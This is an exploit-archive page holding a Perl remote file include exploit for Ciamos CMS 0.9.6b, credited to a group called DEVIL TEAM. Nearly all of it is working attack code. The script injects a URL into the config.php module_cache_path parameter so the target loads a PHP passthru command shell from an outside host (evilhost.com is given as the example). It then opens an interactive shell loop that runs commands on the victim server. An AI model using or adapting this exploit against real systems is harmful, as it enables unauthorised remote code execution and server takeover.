Home / exploits ciamosCMS096b-rfi.txt
Posted on 09 October 2006
#!/usr/bin/perl use LWP::UserAgent; #::::::::: :::::::::: ::: ::: ::::::::::: ::: #:+: :+: :+: :+: :+: :+: :+: #+:+ +:+ +:+ +:+ +:+ +:+ +:+ #+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ #+#+ +#+ +#+ +#+ +#+ +#+ +#+ ##+# #+# #+# #+#+#+# #+# #+# ########## ########## ### ########### ########## #::::::::::: :::::::::: ::: :::: :::: # :+: :+: :+: :+: +:+:+: :+:+:+ # +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ # +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ # +#+ +#+ +#+ +#+ +#+ +#+ # #+# #+# #+# #+# #+# #+# # ### ########## ### ### ### ### # # #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- - - [DEVIL TEAM THE BEST POLISH TEAM] - - #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- [Script name: Ciamos CMS 0.9.6b #- [Script site: http://sourceforge.net/projects/ciamos #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Find by: Kacper (a.k.a Rahim) #+ #- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam #+ #- Contact: kacper1964@yahoo.pl #- or #- http://www.rahim.webd.pl/ #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Special Greetz: DragonHeart ;-) #- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus #- SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios #- #- Greetz for all users DEVIL TEAM IRC Channel !! #!@ Przyjazni nie da sie zamienic na marne korzysci @! #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #+ #- Z Dedykacja dla osoby, #- bez ktorej nie mogl bym zyc... #- K.C:* J.M (a.k.a Magaja) #+ #+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # usage: # perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd> # # perl exploit.pl http://site.com/[Ciamos_Path]/ http://site.com/cmd.txt cmd # # cmd shell example: <?passthru($_GET[cmd]);?> # # cmd shell variable: ($_GET[cmd]); ################################################### $sciezka = $ARGV[0]; $sciezkacmd = $ARGV[1]; $komenda = $ARGV[2]; if($sciezka!~/http:/// || $sciezkacmd!~/http:/// || !$komenda){usage()} head(); while() { print "[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$sciezka.'modules/forum/include/config.php?module_cache_path='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die " CouldNot connect "; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[ ]/[ê]/; if (!$cmd) {print " Enter a Command "; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/) {print " Could Not Connect to cmd Host or Invalid Command Variable ";exit} elsif ($return =~/^<br./>.<b>Warning/) {print " Invalid Command "} if($return =~ /(.+)<br./>.<b>Warning.(.+)<br./>.<b>Warning/) { $finreturn = $1; $finreturn=~ tr/[ê]/[ ]/; print " $finreturn "; last; } else {print "[shell] $";}}}last; sub head() { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; print "+ - - [DEVIL TEAM THE BEST POLISH TEAM] - - + "; print "+Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit+ "; print "+ http://www.rahim.webd.pl/ + "; print "+ Find by: Kacper (a.k.a Rahim) + "; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; } sub usage() { head(); print " Usage: perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd> "; print " <Ciamos Locaction> - Full path to Ciamos ex: http://www.site.com/Ciamos/ "; print " <shell location> - Path to cmd Shell e.g http://www.evilhost.com/cmd.txt "; print " <shell cmd> - Command variable used in php shell "; print " ============================================================================ "; print " Find by: Kacper (a.k.a Rahim) "; print " http://www.rahim.webd.pl/ "; print " Special Greetz: DragonHeart ;-) "; print " ============================================================================ "; exit(); } #Pozdrawiam wszystkich ;-) #DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam